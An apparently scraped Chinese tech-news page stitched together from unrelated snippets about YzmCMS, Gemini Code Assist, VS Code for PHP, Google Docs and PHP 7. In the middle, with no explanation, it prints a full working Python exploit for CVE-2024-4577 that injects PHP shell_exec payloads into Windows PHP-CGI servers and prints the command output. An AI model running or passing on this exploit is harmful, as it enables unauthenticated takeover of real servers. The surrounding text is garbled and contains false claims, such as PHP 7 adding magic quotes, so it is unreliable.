https://github.com/deepseek-ai/DeepSeek-V3

其实大家可以看看其它作者都用啥工具（语言就是一个工具）大家能看到很多RUST,C,C++,GO,TS,PHP....

复制链接到夸克APP打开即可！及时下载，避免失效！

一、软件库

YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统，YzmCMS简洁、安全、开源、实用，可运行在Linux、Windows、MacOSX、Solaris等各种平台上，专注为公司企业、个人站长快速建站提供解决方案。

YzmCMS V5.7 正式版

今天，Google宣布Gemini Code Assist Enterprise 将为企业软件开发人员提供企业级人工智能辅助。 利用 Gemini 的大型上下文窗口，开发人员可以根据对本地代码库的深入了解获得更多相关响应。 Google还允许企业根据内部最佳实践和内部库定制 Gemini Code Assist。

Gemini Code Assist 提供人工智能编码辅助功能，帮助软件开发人员在整个软件开发生命周期内构建、部署和运行应用程序。 Gemini Code Assist 可在 VS Code 和 JetBrains IDE 等流行的集成开发环境中使用。启用后，开发人员可以获得代码补全、从注释中生成完整的函数或代码块、创建单元测试等。 Gemini Code Assist 的最大优点是它能根据开发人员的提示提供上下文化的响应。

友情提醒: 及时下载，避免失效！

用最近使用PhpStorm的激活码到期了，就琢磨着换一个编辑器。vscode评价挺好的而且轻量级免费开源，所以决定vscode开发PHP。

1. vscode介绍
2. vscode常用的PHP插件
3. 安装插件
4. vscode 配置自己习惯的快捷键

直接上代码：

# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.php.net/downloads.php
# Version: PHP 8.3,* < 8.3.8,  8.2.*<8.2.20, 8.1.*, 8.1.29
# CVE : CVE-2024-4577

from requests import Request, Session
import sys
import json



def title():
    print('''
    
   _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |        | || | | ____|____  |____  |
 | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / / 
 | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \   / /    / /  
 | |____   \  /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /   
  \_____|   \/   |______|  |____|\___/____|  |_|           |_| |____/ /_/    /_/                                                                                                              
                                                                                                                      
                                                                              
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py
    ''')   


def exploit(url, command):       
    payloads = {
        '<?php echo "vulnerable"; ?>',
        '<?php echo shell_exec("'+command+'"); ?>' 
    }    
    headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
    'Content-Type': 'application/x-www-form-urlencoded'}
    s = Session()
    for payload in payloads:
        url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
        req = Request('POST', url, data=payload, headers=headers)
        prepped = req.prepare()
        del prepped.headers['Content-Type']
        resp = s.send(prepped,
        verify=False,
        timeout=15)
        #print(prepped.headers)
        #print(url)
        #print(resp.headers)       
        #print(payload)
        print(resp.status_code)
        print(resp.text)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 2):
        print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))        
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2])

在对 Google Docs 代码块的更新中，Google增加了对 14 种新编程语言和其他代码语言的支持，以便轻松地将代码可视化并使其更具可读性。2022 年，Google推出了一项新的智能画布功能，允许用户通过代码块在文档中格式化和显示代码。该功能有助于以行业标准可视化代码，并应用所需的格式，从而简化协作。

它还省去了将代码粘贴到文档中并通过高亮文本手动应用样式的额外工作。这在记录软件项目、API 或编码教程时非常有用，因为代码片段对于提供示例至关重要。

然而，智能画布不仅限于代码块。它允许您插入各种内容，例如日历邀请模板、@提及、电子邮件草稿、AI摘要和模板，并使用无页格式。它为项目管理任务提供了构建块，例如审核跟踪、团队目录、项目资产、内容发布跟踪器等。

七年以来，PHP一直是第四大最流行的编程语言，驱动全球超过2亿多个网站，全球超过81.7%的公共网站在服务器端采用PHP。PHP在这个星期有了自2004年以来最大的飞跃，因为PHP 7已经发布。PHP 7最大特色是极大地改进了性能，在一些WordPress基准测试当中，性能可以达到PHP 5.6的3倍。

PHP 7还有其他一些比较小的改进，比如显著减少内存使用，添加返回类型声明等等功能。PHP 7包含了一些重大安全改进，如除去PHP安全模式，添加魔术引号，有一些新的保留关键字等等。这意味着像WordPress等Web应用程序需要局部重新设计，以便为PHP 7发布做好准备，现在WordPress看起来已经完全兼容PHP 7。